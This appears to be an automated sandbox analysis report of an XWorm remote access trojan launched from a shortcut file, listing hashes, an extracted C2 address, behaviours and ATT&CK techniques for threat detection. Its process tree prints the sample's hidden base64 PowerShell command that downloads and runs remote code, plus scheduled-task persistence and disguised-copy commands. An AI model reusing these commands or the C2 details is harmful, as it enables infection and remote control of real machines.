xworm | ee3dad6434cb64d091d15fda5900d088f46b64d0603a449d6bd46afb9705140a

General

Target

nTalu.lnk
Size

2KB
MD5

79b6a1c72f61bf2358eca72f4d67b4d7
SHA1

22c3540ce90d11b32b0a9c2eae94ae467af2aabf
SHA256

ee3dad6434cb64d091d15fda5900d088f46b64d0603a449d6bd46afb9705140a
SHA512

839fb585a20812324f4058cb2e354be77b243c212fcf35e1c16fb2668a266cbeb784844512e0aa15e6077cf2570e88b04bb986164f4972e1bc63a61576967d6e

Score

10^/10

xworm discovery rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

lisa22194141.duckdns.org:7000

Mutex

2tuao2989c3EVwzo

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3108-33-0x0000000000400000-0x0000000000410000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

2 2812 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2077438316-259605770-1264560426-1000\Control Panel\International\Geo\Nation cmd.exe
Executes dropped EXE 2 IoCs

Processes:

XovwDNpiRZKtFFANLO.exesvchost.exe

pid process

928 XovwDNpiRZKtFFANLO.exe
2172 svchost.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

XovwDNpiRZKtFFANLO.exe

description pid process target process

PID 928 set thread context of 3108 928 XovwDNpiRZKtFFANLO.exe RegAsm.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	pid	process
2	2812	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2077438316-259605770-1264560426-1000\Control Panel\International\Geo\Nation	cmd.exe

pid	process
928	XovwDNpiRZKtFFANLO.exe
2172	svchost.exe

description	pid	process	target process
PID 928 set thread context of 3108	928	XovwDNpiRZKtFFANLO.exe	RegAsm.exe

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cmd.execmd.exeschtasks.execmd.exesvchost.exeXovwDNpiRZKtFFANLO.exeRegAsm.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	XovwDNpiRZKtFFANLO.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

2932 schtasks.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

RegAsm.exe

pid process

3108 RegAsm.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exeRegAsm.exe

pid process

2812 powershell.exe
2812 powershell.exe
3108 RegAsm.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exeRegAsm.exe

description pid process

Token: SeDebugPrivilege 2812 powershell.exe
Token: SeDebugPrivilege 3108 RegAsm.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

RegAsm.exe

pid process

3108 RegAsm.exe

pid	process
2932	schtasks.exe

pid	process
3108	RegAsm.exe

pid	process
2812	powershell.exe
2812	powershell.exe
3108	RegAsm.exe

description	pid	process
Token: SeDebugPrivilege	2812	powershell.exe
Token: SeDebugPrivilege	3108	RegAsm.exe

pid	process
3108	RegAsm.exe

Suspicious use of WriteProcessMemory 25 IoCs

Processes:

cmd.exepowershell.exeXovwDNpiRZKtFFANLO.execmd.exe

description	pid	process	target process
PID 4332 wrote to memory of 2812	4332	cmd.exe	powershell.exe
PID 4332 wrote to memory of 2812	4332	cmd.exe	powershell.exe
PID 2812 wrote to memory of 928	2812	powershell.exe	XovwDNpiRZKtFFANLO.exe
PID 2812 wrote to memory of 928	2812	powershell.exe	XovwDNpiRZKtFFANLO.exe
PID 2812 wrote to memory of 928	2812	powershell.exe	XovwDNpiRZKtFFANLO.exe
PID 928 wrote to memory of 3108	928	XovwDNpiRZKtFFANLO.exe	RegAsm.exe
PID 928 wrote to memory of 3108	928	XovwDNpiRZKtFFANLO.exe	RegAsm.exe
PID 928 wrote to memory of 3108	928	XovwDNpiRZKtFFANLO.exe	RegAsm.exe
PID 928 wrote to memory of 3108	928	XovwDNpiRZKtFFANLO.exe	RegAsm.exe
PID 928 wrote to memory of 3108	928	XovwDNpiRZKtFFANLO.exe	RegAsm.exe
PID 928 wrote to memory of 3108	928	XovwDNpiRZKtFFANLO.exe	RegAsm.exe
PID 928 wrote to memory of 3108	928	XovwDNpiRZKtFFANLO.exe	RegAsm.exe
PID 928 wrote to memory of 3108	928	XovwDNpiRZKtFFANLO.exe	RegAsm.exe
PID 928 wrote to memory of 1216	928	XovwDNpiRZKtFFANLO.exe	cmd.exe
PID 928 wrote to memory of 1216	928	XovwDNpiRZKtFFANLO.exe	cmd.exe
PID 928 wrote to memory of 1216	928	XovwDNpiRZKtFFANLO.exe	cmd.exe
PID 928 wrote to memory of 3212	928	XovwDNpiRZKtFFANLO.exe	cmd.exe
PID 928 wrote to memory of 3212	928	XovwDNpiRZKtFFANLO.exe	cmd.exe
PID 928 wrote to memory of 3212	928	XovwDNpiRZKtFFANLO.exe	cmd.exe
PID 3212 wrote to memory of 2932	3212	cmd.exe	schtasks.exe
PID 3212 wrote to memory of 2932	3212	cmd.exe	schtasks.exe
PID 3212 wrote to memory of 2932	3212	cmd.exe	schtasks.exe
PID 928 wrote to memory of 4832	928	XovwDNpiRZKtFFANLO.exe	cmd.exe
PID 928 wrote to memory of 4832	928	XovwDNpiRZKtFFANLO.exe	cmd.exe
PID 928 wrote to memory of 4832	928	XovwDNpiRZKtFFANLO.exe	cmd.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\nTalu.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4332
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -W h -e JAB4AGMAZQAgAD0AIAAnAHgAJwA7ACAASQBlAHgAKABJAHIAbQAgAGgAdAB0AHAAcwA6AC8ALwAwAHgAMAAuAHMAdAAvAFgAZgBJAFQALgB0AHgAdAApADsAIAAkAHgAYwBlACAAPQAgACcAeAAnAA==
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2812
- - C:\Users\Admin\AppData\Roaming\XovwDNpiRZKtFFANLO.exe
    "C:\Users\Admin\AppData\Roaming\XovwDNpiRZKtFFANLO.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:928
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: AddClipboardFormatListener
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:3108
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C mkdir "C:\Users\Admin\AppData\Roaming\svchost"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1216
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\svchost\svchost.exe'" /f
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3212
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\svchost\svchost.exe'" /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2932
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C copy "C:\Users\Admin\AppData\Roaming\XovwDNpiRZKtFFANLO.exe" "C:\Users\Admin\AppData\Roaming\svchost\svchost.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4832

C:\Users\Admin\AppData\Roaming\svchost\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost\svchost.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2172

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Persistence

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Privilege Escalation

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_girwwvvt.av5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\XovwDNpiRZKtFFANLO.exe

Filesize
21.0MB

MD5
7d65fe5871d783fdd6c912675a2807cb

SHA1
2f2c294c04d7bdf7953562d263c68305695126ad

SHA256
c4854be24acd139e4f4658246b362e12913b57bf4ff6a85c3c295ea08ac5a33c

SHA512
167e9cd7258dcaf66d2f716e8f16a4a78b50faff08863ad4bbe4fc1d57b45b814677b60b74346c7d56edbabb0544dbfb9d27770f1bf0a6335a18cec0563d774c

Download Submit
memory/928-32-0x0000000000420000-0x000000000044C000-memory.dmp

Filesize
176KB

Download
memory/2812-14-0x00007FFA3D400000-0x00007FFA3DEC1000-memory.dmp

Filesize
10.8MB

Download
memory/2812-8-0x0000016867650000-0x0000016867672000-memory.dmp

Filesize
136KB

Download
memory/2812-15-0x00007FFA3D403000-0x00007FFA3D405000-memory.dmp

Filesize
8KB

Download
memory/2812-16-0x00007FFA3D400000-0x00007FFA3DEC1000-memory.dmp

Filesize
10.8MB

Download
memory/2812-18-0x0000016871E80000-0x0000016872042000-memory.dmp

Filesize
1.8MB

Download
memory/2812-13-0x00007FFA3D400000-0x00007FFA3DEC1000-memory.dmp

Filesize
10.8MB

Download
memory/2812-30-0x00007FFA3D400000-0x00007FFA3DEC1000-memory.dmp

Filesize
10.8MB

Download
memory/2812-2-0x00007FFA3D403000-0x00007FFA3D405000-memory.dmp

Filesize
8KB

Download
memory/3108-33-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/3108-34-0x0000000005800000-0x000000000589C000-memory.dmp

Filesize
624KB

Download
memory/3108-38-0x00000000060C0000-0x0000000006664000-memory.dmp

Filesize
5.6MB

Download
memory/3108-39-0x0000000006910000-0x00000000069A2000-memory.dmp

Filesize
584KB

Download
memory/3108-40-0x0000000006890000-0x000000000689A000-memory.dmp

Filesize
40KB

Download
memory/3108-43-0x0000000007610000-0x0000000007676000-memory.dmp

Filesize
408KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads